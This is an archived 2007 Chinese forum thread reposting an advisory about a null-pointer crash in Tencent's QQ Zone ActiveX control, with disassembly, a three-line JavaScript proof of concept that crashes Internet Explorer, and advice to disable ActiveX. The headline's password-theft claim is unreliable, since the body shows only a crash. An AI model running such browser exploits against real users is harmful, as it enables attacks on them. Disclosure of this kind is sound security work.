找回密码

碧海潮声大学生网

查看: 625|回复: 2
打印 上一主题 下一主题

〖注意〗可盗取密码 QQ新漏洞涉及所有版本

[复制链接]
跳转到指定楼层
1#
发表于 2007-2-14 20:08 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
可盗取密码 QQ新漏洞涉及所有版本

幻影旅团的axis发现了一个QQZone的activex漏洞.在使用WebCtrl.

  方法时,将引用一个空指针,造成ie崩溃.由于该activex没有标记为safe,故会出现安全提示.

  细节:  

  在TencentQQQZoneTWebCtrl.dll中,使用Navigate方法时,将造成一个空指针引用  

  051024C0 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4]

  051024C4 8B5424 08 MOV EDX,DWORD PTR SS:[ESP+8]

  051024C8 6A 00 PUSH 0

  051024CA 6A 00 PUSH 0

  051024CC 8B80 B8000000 MOV EAX,DWORD PTR DS:[EAX+B8]

  051024D2 6A 00 PUSH 0

  051024D4 6A 00 PUSH 0

  051024D6 52 PUSH EDX

  051024D7 8B08 MOV ECX,DWORD PTR DS:[EAX]  

  此时EAX为null  

  幻影旅团将对此发布一个POC代码,请勿将此作为非法用途  

  POC:

  >

  var qqkcuf = new ActiveXObject("WebCtrl.TWebControl.1");

  var arg1 = 0;  

  qqkcuf.Navigate(arg1);  

  建议:  

  禁止ie执行activex  

  厂商补丁:

  目前厂商没有发布补丁
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 分享分享 顶 踩
2#
 楼主| 发表于 2007-2-14 20:09 | 只看该作者
偶看不懂,别问我如何利用这个漏洞。 [mop098]
回复 支持 反对

使用道具 举报

3#
发表于 2007-2-15 09:08 | 只看该作者
对QQ  没兴趣
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|小黑屋| 碧海潮声大学生网  

Copyright © 2001-2013 Comsenz Inc.   All Rights Reserved.

Powered by Discuz! X3.2( 浙ICP备11026473号 )

快速回复 返回顶部 返回列表